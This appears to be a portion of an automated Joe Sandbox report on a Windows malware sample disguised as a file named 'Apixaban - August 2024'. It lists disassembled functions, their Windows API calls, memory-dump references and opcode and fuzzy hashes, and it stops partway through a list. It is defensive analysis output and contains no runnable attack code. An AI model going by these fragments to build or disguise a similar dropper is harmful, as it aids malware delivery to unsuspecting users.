                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                                                • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                                                Function 00405BD7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB
                                                Strings
                                                • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00405BDA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                                • API String ID: 2738559852-2559241417
                                                • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
                                                • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                Function 004022D3 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402C42: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                                                • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValue
                                                • String ID:
                                                • API String ID: 849931509-0
                                                • Opcode ID: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
                                                • Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
                                                • Opcode Fuzzy Hash: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
                                                • Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A
                                                Function 00405265 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00405275
                                                  • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004052C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitialize
                                                • String ID:
                                                • API String ID: 2896919175-0
                                                • Opcode ID: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
                                                • Instruction ID: 554e103746b9e2db7aaf45f87dc76b5a043826cfff103a1ab0517efa01412f9c
                                                • Opcode Fuzzy Hash: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
                                                • Instruction Fuzzy Hash: 8FF090B6645600EBF62157549D05B677364EFE0300F1948BEEE44B22A1D7794C428F6D
                                                Function 00405B54 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                Function 00405B2F Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                • Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
                                                • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                • Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6
                                                Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
                                                • Instruction ID: 9dcfef7e452db0a7b9eae0ecc372c740654949990ed8f849d8faaf285a661dbe
                                                • Opcode Fuzzy Hash: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
                                                • Instruction Fuzzy Hash: 8BD012B2708100D7DB10DFA59A0899D77749B15325F700977E101F21D0D2B895519A2A
                                                Function 00404179 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                • Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
                                                • Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                • Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D
                                                Function 00404162 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                Function 0040330D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                Function 0040414F Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
                                                • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69

                                                Non-executed Functions

                                                Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                                                • GetDlgItem.USER32(?,00000408), ref: 00404B31
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                                                • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                                                • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                                                • DeleteObject.GDI32(00000000), ref: 00404C04
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                                                • ShowWindow.USER32(?,00000005), ref: 00404D5E
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
